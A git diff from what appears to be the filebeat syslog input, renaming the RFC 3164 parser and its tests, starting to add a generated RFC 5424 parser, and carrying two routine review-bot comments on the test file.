@@ -991,7 +991,7 @@ func Parse(data []byte, event *event) { goto _test_eof32 } st_case_32: -//line parser.go:974 +//line rfc3164_parser.go:974 if data[(p)] == 58 { goto st33 } @@ -1009,7 +1009,7 @@ func Parse(data []byte, event *event) { } goto st2 tr46: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -1022,7 +1022,7 @@ func Parse(data []byte, event *event) { } } -//line parser.rl:81 +//line parser/common.rl:91 event.SetHostname(data[tok:p]) @@ -1032,7 +1032,7 @@ func Parse(data []byte, event *event) { goto _test_eof34 } st_case_34: -//line parser.go:1013 +//line rfc3164_parser.go:1013 switch data[(p)] { case 32: goto st26 @@ -1065,7 +1065,7 @@ func Parse(data []byte, event *event) { } goto st2 tr57: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -1080,7 +1080,7 @@ func Parse(data []byte, event *event) { goto st35 tr58: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -1093,7 +1093,7 @@ func Parse(data []byte, event *event) { } } -//line parser.rl:81 +//line parser/common.rl:91 event.SetHostname(data[tok:p]) @@ -1103,7 +1103,7 @@ func Parse(data []byte, event *event) { goto _test_eof35 } st_case_35: -//line parser.go:1080 +//line rfc3164_parser.go:1080 switch data[(p)] { case 32: goto tr45 @@ -1136,11 +1136,11 @@ func Parse(data []byte, event *event) { } goto st2 tr41: -//line parser.rl:22 +//line parser/common.rl:3 tok = p -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -1155,7 +1155,7 @@ func Parse(data []byte, event *event) { goto st36 tr44: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -1174,7 +1174,7 @@ func Parse(data []byte, event *event) { goto _test_eof36 } st_case_36: -//line parser.go:1147 +//line rfc3164_parser.go:1147 switch data[(p)] { case 58: goto tr57 
@@ -1200,21 +1200,21 @@ func Parse(data []byte, event *event) { } goto st2 tr35: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st37 tr69: -//line parser.rl:62 +//line parser/common.rl:43 event.SetNanosecond(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1224,7 +1224,7 @@ func Parse(data []byte, event *event) { goto _test_eof37 } st_case_37: -//line parser.go:1197 +//line rfc3164_parser.go:1197 if 48 <= data[(p)] && data[(p)] <= 57 { goto st38 } @@ -1283,19 +1283,19 @@ func Parse(data []byte, event *event) { } goto st2 tr37: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) goto st42 tr65: -//line parser.rl:93 +//line parser/common.rl:103 event.SetTimeZone(data[tok:p]) goto st42 tr71: -//line parser.rl:62 +//line parser/common.rl:43 event.SetNanosecond(data[tok:p]) @@ -1305,7 +1305,7 @@ func Parse(data []byte, event *event) { goto _test_eof42 } st_case_42: -//line parser.go:1278 +//line rfc3164_parser.go:1278 if data[(p)] == 32 { goto st23 } @@ -1314,7 +1314,7 @@ func Parse(data []byte, event *event) { } goto st2 tr63: -//line parser.rl:93 +//line parser/common.rl:103 event.SetTimeZone(data[tok:p]) @@ -1324,7 +1324,7 @@ func Parse(data []byte, event *event) { goto _test_eof43 } st_case_43: -//line parser.go:1297 +//line rfc3164_parser.go:1297 if data[(p)] == 32 { goto st23 } @@ -1338,7 +1338,7 @@ func Parse(data []byte, event *event) { } goto st2 tr36: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) @@ -1348,13 +1348,13 @@ func Parse(data []byte, event *event) { goto _test_eof44 } st_case_44: -//line parser.go:1321 +//line rfc3164_parser.go:1321 if 48 <= data[(p)] && data[(p)] <= 57 { goto tr67 } goto st2 tr67: -//line parser.rl:22 +//line parser/common.rl:3 tok = p 
@@ -1364,7 +1364,7 @@ func Parse(data []byte, event *event) { goto _test_eof45 } st_case_45: -//line parser.go:1337 +//line rfc3164_parser.go:1337 switch data[(p)] { case 32: goto tr68 @@ -1389,21 +1389,21 @@ func Parse(data []byte, event *event) { } goto st2 tr38: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st46 tr72: -//line parser.rl:62 +//line parser/common.rl:43 event.SetNanosecond(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1413,7 +1413,7 @@ func Parse(data []byte, event *event) { goto _test_eof46 } st_case_46: -//line parser.go:1386 +//line rfc3164_parser.go:1386 switch data[(p)] { case 32: goto tr61 @@ -1429,7 +1429,7 @@ func Parse(data []byte, event *event) { } goto st2 tr26: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1439,23 +1439,23 @@ func Parse(data []byte, event *event) { goto _test_eof47 } st_case_47: -//line parser.go:1412 +//line rfc3164_parser.go:1412 if 48 <= data[(p)] && data[(p)] <= 51 { goto st16 } goto st2 tr4: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st48 tr136: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1465,7 +1465,7 @@ func Parse(data []byte, event *event) { goto _test_eof48 } st_case_48: -//line parser.go:1438 +//line rfc3164_parser.go:1438 switch data[(p)] { case 112: goto st49 @@ -1498,7 +1498,7 @@ func Parse(data []byte, event *event) { } goto st2 tr77: -//line parser.rl:34 +//line parser/common.rl:15 event.SetMonth(data[tok:p]) @@ -1508,7 +1508,7 @@ func Parse(data []byte, event *event) { goto _test_eof51 } st_case_51: -//line parser.go:1481 +//line rfc3164_parser.go:1481 switch data[(p)] { case 32: goto st52 @@ -1538,7 +1538,7 @@ func Parse(data []byte, event *event) { } goto st2 tr82: -//line parser.rl:22 +//line parser/common.rl:3 tok = p 
@@ -1548,7 +1548,7 @@ func Parse(data []byte, event *event) { goto _test_eof53 } st_case_53: -//line parser.go:1521 +//line rfc3164_parser.go:1521 if data[(p)] == 32 { goto tr83 } @@ -1557,7 +1557,7 @@ func Parse(data []byte, event *event) { } goto st2 tr83: -//line parser.rl:46 +//line parser/common.rl:27 event.SetDay(data[tok:p]) @@ -1567,7 +1567,7 @@ func Parse(data []byte, event *event) { goto _test_eof54 } st_case_54: -//line parser.go:1540 +//line rfc3164_parser.go:1540 if data[(p)] == 50 { goto tr85 } @@ -1576,7 +1576,7 @@ func Parse(data []byte, event *event) { } goto st2 tr84: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1586,7 +1586,7 @@ func Parse(data []byte, event *event) { goto _test_eof55 } st_case_55: -//line parser.go:1559 +//line rfc3164_parser.go:1559 if 48 <= data[(p)] && data[(p)] <= 57 { goto st56 } @@ -1601,7 +1601,7 @@ func Parse(data []byte, event *event) { } goto st2 tr87: -//line parser.rl:50 +//line parser/common.rl:31 event.SetHour(data[tok:p]) @@ -1611,13 +1611,13 @@ func Parse(data []byte, event *event) { goto _test_eof57 } st_case_57: -//line parser.go:1584 +//line rfc3164_parser.go:1584 if 48 <= data[(p)] && data[(p)] <= 53 { goto tr88 } goto st2 tr88: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1627,7 +1627,7 @@ func Parse(data []byte, event *event) { goto _test_eof58 } st_case_58: -//line parser.go:1600 +//line rfc3164_parser.go:1600 if 48 <= data[(p)] && data[(p)] <= 57 { goto st59 } @@ -1642,7 +1642,7 @@ func Parse(data []byte, event *event) { } goto st2 tr90: -//line parser.rl:54 +//line parser/common.rl:35 event.SetMinute(data[tok:p]) @@ -1652,13 +1652,13 @@ func Parse(data []byte, event *event) { goto _test_eof60 } st_case_60: -//line parser.go:1625 +//line rfc3164_parser.go:1625 if 48 <= data[(p)] && data[(p)] <= 53 { goto tr91 } goto st2 tr91: -//line parser.rl:22 +//line parser/common.rl:3 tok = p 
@@ -1668,7 +1668,7 @@ func Parse(data []byte, event *event) { goto _test_eof61 } st_case_61: -//line parser.go:1641 +//line rfc3164_parser.go:1641 if 48 <= data[(p)] && data[(p)] <= 57 { goto st62 } @@ -1691,7 +1691,7 @@ func Parse(data []byte, event *event) { } goto st2 tr93: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) @@ -1701,13 +1701,13 @@ func Parse(data []byte, event *event) { goto _test_eof63 } st_case_63: -//line parser.go:1674 +//line rfc3164_parser.go:1674 if 48 <= data[(p)] && data[(p)] <= 57 { goto tr94 } goto st2 tr94: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1717,7 +1717,7 @@ func Parse(data []byte, event *event) { goto _test_eof64 } st_case_64: -//line parser.go:1690 +//line rfc3164_parser.go:1690 switch data[(p)] { case 32: goto tr68 @@ -1734,7 +1734,7 @@ func Parse(data []byte, event *event) { } goto st2 tr85: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1744,13 +1744,13 @@ func Parse(data []byte, event *event) { goto _test_eof65 } st_case_65: -//line parser.go:1717 +//line rfc3164_parser.go:1717 if 48 <= data[(p)] && data[(p)] <= 51 { goto st56 } goto st2 tr80: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1760,7 +1760,7 @@ func Parse(data []byte, event *event) { goto _test_eof66 } st_case_66: -//line parser.go:1733 +//line rfc3164_parser.go:1733 if data[(p)] == 32 { goto tr83 } @@ -1774,7 +1774,7 @@ func Parse(data []byte, event *event) { } goto st2 tr81: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1784,7 +1784,7 @@ func Parse(data []byte, event *event) { goto _test_eof67 } st_case_67: -//line parser.go:1757 +//line rfc3164_parser.go:1757 if data[(p)] == 32 { goto tr83 } 
@@ -1861,17 +1861,17 @@ func Parse(data []byte, event *event) { } goto st2 tr5: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st74 tr137: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1881,7 +1881,7 @@ func Parse(data []byte, event *event) { goto _test_eof74 } st_case_74: -//line parser.go:1854 +//line rfc3164_parser.go:1854 if data[(p)] == 101 { goto st75 } @@ -1947,17 +1947,17 @@ func Parse(data []byte, event *event) { } goto st2 tr6: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st81 tr138: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -1967,7 +1967,7 @@ func Parse(data []byte, event *event) { goto _test_eof81 } st_case_81: -//line parser.go:1940 +//line rfc3164_parser.go:1940 if data[(p)] == 101 { goto st82 } @@ -2033,17 +2033,17 @@ func Parse(data []byte, event *event) { } goto st2 tr7: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st88 tr139: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2053,7 +2053,7 @@ func Parse(data []byte, event *event) { goto _test_eof88 } st_case_88: -//line parser.go:2026 +//line rfc3164_parser.go:2026 switch data[(p)] { case 97: goto st89 @@ -2128,17 +2128,17 @@ func Parse(data []byte, event *event) { } goto st2 tr8: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st94 tr140: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2148,7 +2148,7 @@ func Parse(data []byte, event *event) { goto _test_eof94 } st_case_94: -//line parser.go:2121 +//line rfc3164_parser.go:2121 if data[(p)] == 97 { goto st95 } 
@@ -2195,17 +2195,17 @@ func Parse(data []byte, event *event) { } goto st2 tr9: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st98 tr141: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2215,7 +2215,7 @@ func Parse(data []byte, event *event) { goto _test_eof98 } st_case_98: -//line parser.go:2188 +//line rfc3164_parser.go:2188 if data[(p)] == 111 { goto st99 } @@ -2230,17 +2230,17 @@ func Parse(data []byte, event *event) { } goto st2 tr10: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st100 tr142: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2250,7 +2250,7 @@ func Parse(data []byte, event *event) { goto _test_eof100 } st_case_100: -//line parser.go:2223 +//line rfc3164_parser.go:2223 if data[(p)] == 99 { goto st101 } @@ -2280,17 +2280,17 @@ func Parse(data []byte, event *event) { } goto st2 tr11: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st103 tr143: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2300,7 +2300,7 @@ func Parse(data []byte, event *event) { goto _test_eof103 } st_case_103: -//line parser.go:2273 +//line rfc3164_parser.go:2273 if data[(p)] == 101 { goto st104 } @@ -2339,7 +2339,7 @@ func Parse(data []byte, event *event) { } goto st2 tr2: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2349,7 +2349,7 @@ func Parse(data []byte, event *event) { goto _test_eof107 } st_case_107: -//line parser.go:2322 +//line rfc3164_parser.go:2322 if data[(p)] == 58 { goto st112 } @@ -2421,7 +2421,7 @@ func Parse(data []byte, event *event) { } goto st2 tr132: -//line parser.rl:22 +//line parser/common.rl:3 tok = p 
@@ -2431,7 +2431,7 @@ func Parse(data []byte, event *event) { goto _test_eof113 } st_case_113: -//line parser.go:2404 +//line rfc3164_parser.go:2404 switch data[(p)] { case 32: goto tr134 @@ -2461,7 +2461,7 @@ func Parse(data []byte, event *event) { } goto tr133 tr3: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2471,13 +2471,13 @@ func Parse(data []byte, event *event) { goto _test_eof114 } st_case_114: -//line parser.go:2444 +//line rfc3164_parser.go:2444 if 48 <= data[(p)] && data[(p)] <= 57 { goto tr144 } goto st2 tr144: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2487,7 +2487,7 @@ func Parse(data []byte, event *event) { goto _test_eof115 } st_case_115: -//line parser.go:2460 +//line rfc3164_parser.go:2460 if data[(p)] == 62 { goto tr146 } @@ -2541,7 +2541,7 @@ func Parse(data []byte, event *event) { } goto st2 tr146: -//line parser.rl:26 +//line parser/common.rl:7 event.SetPriority(data[tok:p]) @@ -2551,7 +2551,7 @@ func Parse(data []byte, event *event) { goto _test_eof120 } st_case_120: -//line parser.go:2524 +//line rfc3164_parser.go:2524 switch data[(p)] { case 32: goto tr1 @@ -2587,7 +2587,7 @@ func Parse(data []byte, event *event) { st_case_1: goto tr12 tr12: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -2597,7 +2597,7 @@ func Parse(data []byte, event *event) { goto _test_eof121 } st_case_121: -//line parser.go:2570 +//line rfc3164_parser.go:2570 goto st121 st_out: _test_eof2: 
@@ -2970,16 +2970,16 @@ func Parse(data []byte, event *event) { if (p) == eof { switch cs { case 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121: -//line parser.rl:30 +//line parser/common.rl:11 event.SetMessage(data[tok:p]) -//line parser.go:2703 +//line rfc3164_parser.go:2703 } } } -//line parser.rl:105 +//line parser/rfc3164_parser.rl:28 } diff --git a/filebeat/input/syslog/parser_test.go b/filebeat/input/syslog/rfc3164_test.go similarity index 98% rename from filebeat/input/syslog/parser_test.go rename to filebeat/input/syslog/rfc3164_test.go index 1c83a990e55..185f8df7d3a 100644 --- a/filebeat/input/syslog/parser_test.go +++ b/filebeat/input/syslog/rfc3164_test.go @@ -25,7 +25,7 @@ import ( "github.com/stretchr/testify/assert" ) -func TestParseSyslog(t *testing.T) { +func TestParserRFC3164Syslog(t *testing.T) { tests := []struct { title string log []byte @@ -668,7 +668,7 @@ func TestParseSyslog(t *testing.T) { for _, test := range tests { t.Run(fmt.Sprintf("%s:%s", test.title, string(test.log)), func(t *testing.T) { l := newEvent() - Parse(test.log, l) + ParserRFC3164(test.log, l) assert.Equal(t, test.syslog.Message(), l.Message()) assert.Equal(t, test.syslog.Hostname(), l.Hostname()) assert.Equal(t, test.syslog.Priority(), l.Priority()) 
@@ -707,7 +707,7 @@ func TestMonth(t *testing.T) {
 t.Run("Month "+shortMonth, func(t *testing.T) {
 log := fmt.Sprintf("<34>%s 1 22:14:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", shortMonth)
 l := newEvent()
- Parse([]byte(log), l)
+ ParserRFC3164([]byte(log), l)
 assert.Equal(t, month, l.Month())
 })
 }
@@ -718,7 +718,7 @@ func TestMonth(t *testing.T) {
 t.Run("Month "+month.String(), func(t *testing.T) {
 log := fmt.Sprintf("<34>%s 1 22:14:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", month.String())
 l := newEvent()
- Parse([]byte(log), l)
+ ParserRFC3164([]byte(log), l)
 assert.Equal(t, month, l.Month())
 })
 }
@@ -730,7 +730,7 @@ func TestDay(t *testing.T) {
 t.Run(fmt.Sprintf("Day %d", d), func(t *testing.T) {
 log := fmt.Sprintf("<34>Oct %2d 22:14:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", d)
 l := newEvent()
- Parse([]byte(log), l)
+ ParserRFC3164([]byte(log), l)
 assert.Equal(t, d, l.Day())
 })
 }
@@ -741,7 +741,7 @@ func TestHour(t *testing.T) {
 t.Run(fmt.Sprintf("Hour %d", d), func(t *testing.T) {
 log := fmt.Sprintf("<34>Oct 11 %02d:14:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", d)
 l := newEvent()
- Parse([]byte(log), l)
+ ParserRFC3164([]byte(log), l)
 assert.Equal(t, d, l.Hour())
 })
 }
@@ -752,7 +752,7 @@ func TestMinute(t *testing.T) {
 t.Run(fmt.Sprintf("Minute %d", d), func(t *testing.T) {
 log := fmt.Sprintf("<34>Oct 11 10:%02d:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", d)
 l := newEvent()
- Parse([]byte(log), l)
+ ParserRFC3164([]byte(log), l)
 assert.Equal(t, d, l.Minute())
 })
 }
@@ -763,7 +763,7 @@ func TestSecond(t *testing.T) { t.Run(fmt.Sprintf("Second %d", d), func(t *testing.T) { log := fmt.Sprintf("<34>Oct 11 10:15:%02d mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", d) l := newEvent() - Parse([]byte(log), l) + ParserRFC3164([]byte(log), l) assert.Equal(t, d, l.Second()) }) } @@ -774,7 +774,7 @@ func TestPriority(t *testing.T) { t.Run(fmt.Sprintf("Priority %d", d), func(t *testing.T) { log := fmt.Sprintf("<%d>Oct 11 10:15:15 mymachine postfix/smtpd[2000]: 'su root' failed for lonvick on /dev/pts/8", d) l := newEvent() - Parse([]byte(log), l) + ParserRFC3164([]byte(log), l) assert.Equal(t, d, l.Priority()) }) return @@ -783,12 +783,12 @@ func TestPriority(t *testing.T) { var e *event -func BenchmarkParser(b *testing.B) { +func BenchmarkParserRFC3164r(b *testing.B) { b.ReportAllocs() l := newEvent() log := []byte("<34>Oct 11 22:14:15 mymachine su: 'su root' failed for lonvick on /dev/pts/8") for n := 0; n < b.N; n++ { - Parse(log, l) + ParserRFC3164(log, l) e = l } } diff --git a/filebeat/input/syslog/rfc5424_parser.go b/filebeat/input/syslog/rfc5424_parser.go new file mode 100644 index 00000000000..a7efafa55b7 --- /dev/null +++ b/filebeat/input/syslog/rfc5424_parser.go 
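Review bot: The `return` that follows the closing `})` of the `t.Run` call in the TestPriority hunk appears to sit inside the loop over `d`, so only the first priority value would ever reach `ParserRFC3164`. The loop header is outside the hunk, so this is inferred from the use of `d` in the subtest name. Because this parser handles syslog lines that arrive from outside the process, the priority field deserves the whole range the loop was written to cover. I would delete the `return` line while this test is being touched.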
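Review bot: `BenchmarkParserRFC3164r` carries a stray trailing `r`. The test in this file was renamed to `TestParserRFC3164Syslog`, so `func BenchmarkParserRFC3164(b *testing.B) {` would match it and keep `-bench` patterns predictable. The benchmark also has no doc comment; one line such as `// BenchmarkParserRFC3164 measures parsing one RFC 3164 line into a reused event.` would help, ideally with a note on why `e = l` is assigned (presumably to keep the result from being optimised away).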
@@ -0,0 +1,10959 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +//line parser/rfc5424_parser.rl:1 +// Code generated by ragel DO NOT EDIT. +package syslog + +//line rfc5424_parser.go:8 +const syslog_rfc5424_start int = 1 +const syslog_rfc5424_first_final int = 587 +const syslog_rfc5424_error int = 0 + +const syslog_rfc5424_en_main int = 1 + +//line parser/rfc5424_parser.rl:9 + +type machineState struct { + sd_id string + sd_param_name string + sd_value_bs []int +} + +func ParserRFC5424(data []byte, event *event) { + var p, cs int + state := machineState{ + sd_value_bs: []int{}, + } + pe := len(data) + tok := 0 + eof := len(data) + +//line rfc5424_parser.go:34 + { + cs = syslog_rfc5424_start + } + +//line rfc5424_parser.go:39 + { + if (p) == (pe) { + goto _test_eof + } + switch cs { + case 1: + goto st_case_1 + case 0: + goto st_case_0 + case 2: + goto st_case_2 + case 3: + goto st_case_3 + case 4: + goto st_case_4 + case 5: + goto st_case_5 + case 6: + goto st_case_6 + case 7: + goto st_case_7 + case 8: + goto st_case_8 + case 9: + goto st_case_9 + case 10: + goto st_case_10 + case 11: + goto st_case_11 + case 12: + goto st_case_12 + case 13: + goto st_case_13 + case 14: + goto st_case_14 + case 15: + goto st_case_15 
+ case 16: + goto st_case_16 + case 587: + goto st_case_587 + case 588: + goto st_case_588 + case 589: + goto st_case_589 + case 17: + goto st_case_17 + case 18: + goto st_case_18 + case 19: + goto st_case_19 + case 20: + goto st_case_20 + case 21: + goto st_case_21 + case 22: + goto st_case_22 + case 23: + goto st_case_23 + case 24: + goto st_case_24 + case 25: + goto st_case_25 + case 26: + goto st_case_26 + case 27: + goto st_case_27 + case 28: + goto st_case_28 + case 29: + goto st_case_29 + case 30: + goto st_case_30 + case 31: + goto st_case_31 + case 32: + goto st_case_32 + case 33: + goto st_case_33 + case 34: + goto st_case_34 + case 35: + goto st_case_35 + case 36: + goto st_case_36 + case 37: + goto st_case_37 + case 38: + goto st_case_38 + case 39: + goto st_case_39 + case 40: + goto st_case_40 + case 41: + goto st_case_41 + case 42: + goto st_case_42 + case 43: + goto st_case_43 + case 44: + goto st_case_44 + case 45: + goto st_case_45 + case 46: + goto st_case_46 + case 47: + goto st_case_47 + case 48: + goto st_case_48 + case 49: + goto st_case_49 + case 50: + goto st_case_50 + case 51: + goto st_case_51 + case 52: + goto st_case_52 + case 53: + goto st_case_53 + case 54: + goto st_case_54 + case 55: + goto st_case_55 + case 590: + goto st_case_590 + case 56: + goto st_case_56 + case 57: + goto st_case_57 + case 58: + goto st_case_58 + case 59: + goto st_case_59 + case 60: + goto st_case_60 + case 61: + goto st_case_61 + case 62: + goto st_case_62 + case 63: + goto st_case_63 + case 64: + goto st_case_64 + case 65: + goto st_case_65 + case 66: + goto st_case_66 + case 67: + goto st_case_67 + case 68: + goto st_case_68 + case 69: + goto st_case_69 + case 70: + goto st_case_70 + case 71: + goto st_case_71 + case 72: + goto st_case_72 + case 73: + goto st_case_73 + case 74: + goto st_case_74 + case 75: + goto st_case_75 + case 76: + goto st_case_76 + case 77: + goto st_case_77 + case 78: + goto st_case_78 + case 79: + goto st_case_79 + case 80: + goto 
st_case_80 + case 81: + goto st_case_81 + case 82: + goto st_case_82 + case 83: + goto st_case_83 + case 84: + goto st_case_84 + case 85: + goto st_case_85 + case 86: + goto st_case_86 + case 87: + goto st_case_87 + case 88: + goto st_case_88 + case 89: + goto st_case_89 + case 90: + goto st_case_90 + case 91: + goto st_case_91 + case 92: + goto st_case_92 + case 93: + goto st_case_93 + case 94: + goto st_case_94 + case 95: + goto st_case_95 + case 96: + goto st_case_96 + case 97: + goto st_case_97 + case 98: + goto st_case_98 + case 99: + goto st_case_99 + case 100: + goto st_case_100 + case 101: + goto st_case_101 + case 102: + goto st_case_102 + case 103: + goto st_case_103 + case 104: + goto st_case_104 + case 105: + goto st_case_105 + case 106: + goto st_case_106 + case 107: + goto st_case_107 + case 108: + goto st_case_108 + case 109: + goto st_case_109 + case 110: + goto st_case_110 + case 111: + goto st_case_111 + case 112: + goto st_case_112 + case 113: + goto st_case_113 + case 114: + goto st_case_114 + case 115: + goto st_case_115 + case 116: + goto st_case_116 + case 117: + goto st_case_117 + case 118: + goto st_case_118 + case 119: + goto st_case_119 + case 120: + goto st_case_120 + case 121: + goto st_case_121 + case 122: + goto st_case_122 + case 123: + goto st_case_123 + case 124: + goto st_case_124 + case 125: + goto st_case_125 + case 126: + goto st_case_126 + case 127: + goto st_case_127 + case 128: + goto st_case_128 + case 129: + goto st_case_129 + case 130: + goto st_case_130 + case 131: + goto st_case_131 + case 132: + goto st_case_132 + case 133: + goto st_case_133 + case 134: + goto st_case_134 + case 135: + goto st_case_135 + case 136: + goto st_case_136 + case 137: + goto st_case_137 + case 138: + goto st_case_138 + case 139: + goto st_case_139 + case 140: + goto st_case_140 + case 141: + goto st_case_141 + case 142: + goto st_case_142 + case 143: + goto st_case_143 + case 144: + goto st_case_144 + case 145: + goto st_case_145 + case 146: 
+ goto st_case_146 + case 147: + goto st_case_147 + case 148: + goto st_case_148 + case 149: + goto st_case_149 + case 150: + goto st_case_150 + case 151: + goto st_case_151 + case 152: + goto st_case_152 + case 153: + goto st_case_153 + case 154: + goto st_case_154 + case 155: + goto st_case_155 + case 156: + goto st_case_156 + case 157: + goto st_case_157 + case 158: + goto st_case_158 + case 159: + goto st_case_159 + case 160: + goto st_case_160 + case 161: + goto st_case_161 + case 162: + goto st_case_162 + case 163: + goto st_case_163 + case 164: + goto st_case_164 + case 165: + goto st_case_165 + case 166: + goto st_case_166 + case 167: + goto st_case_167 + case 168: + goto st_case_168 + case 169: + goto st_case_169 + case 170: + goto st_case_170 + case 171: + goto st_case_171 + case 172: + goto st_case_172 + case 173: + goto st_case_173 + case 174: + goto st_case_174 + case 175: + goto st_case_175 + case 176: + goto st_case_176 + case 177: + goto st_case_177 + case 178: + goto st_case_178 + case 179: + goto st_case_179 + case 180: + goto st_case_180 + case 181: + goto st_case_181 + case 182: + goto st_case_182 + case 183: + goto st_case_183 + case 184: + goto st_case_184 + case 185: + goto st_case_185 + case 186: + goto st_case_186 + case 187: + goto st_case_187 + case 188: + goto st_case_188 + case 189: + goto st_case_189 + case 190: + goto st_case_190 + case 191: + goto st_case_191 + case 192: + goto st_case_192 + case 193: + goto st_case_193 + case 194: + goto st_case_194 + case 195: + goto st_case_195 + case 196: + goto st_case_196 + case 197: + goto st_case_197 + case 198: + goto st_case_198 + case 199: + goto st_case_199 + case 200: + goto st_case_200 + case 201: + goto st_case_201 + case 202: + goto st_case_202 + case 203: + goto st_case_203 + case 204: + goto st_case_204 + case 205: + goto st_case_205 + case 206: + goto st_case_206 + case 207: + goto st_case_207 + case 208: + goto st_case_208 + case 209: + goto st_case_209 + case 210: + goto 
st_case_210 + case 211: + goto st_case_211 + case 212: + goto st_case_212 + case 213: + goto st_case_213 + case 214: + goto st_case_214 + case 215: + goto st_case_215 + case 216: + goto st_case_216 + case 217: + goto st_case_217 + case 218: + goto st_case_218 + case 219: + goto st_case_219 + case 220: + goto st_case_220 + case 221: + goto st_case_221 + case 222: + goto st_case_222 + case 223: + goto st_case_223 + case 224: + goto st_case_224 + case 225: + goto st_case_225 + case 226: + goto st_case_226 + case 227: + goto st_case_227 + case 228: + goto st_case_228 + case 229: + goto st_case_229 + case 230: + goto st_case_230 + case 231: + goto st_case_231 + case 232: + goto st_case_232 + case 233: + goto st_case_233 + case 234: + goto st_case_234 + case 235: + goto st_case_235 + case 236: + goto st_case_236 + case 237: + goto st_case_237 + case 238: + goto st_case_238 + case 239: + goto st_case_239 + case 240: + goto st_case_240 + case 241: + goto st_case_241 + case 242: + goto st_case_242 + case 243: + goto st_case_243 + case 244: + goto st_case_244 + case 245: + goto st_case_245 + case 246: + goto st_case_246 + case 247: + goto st_case_247 + case 248: + goto st_case_248 + case 249: + goto st_case_249 + case 250: + goto st_case_250 + case 251: + goto st_case_251 + case 252: + goto st_case_252 + case 253: + goto st_case_253 + case 254: + goto st_case_254 + case 255: + goto st_case_255 + case 256: + goto st_case_256 + case 257: + goto st_case_257 + case 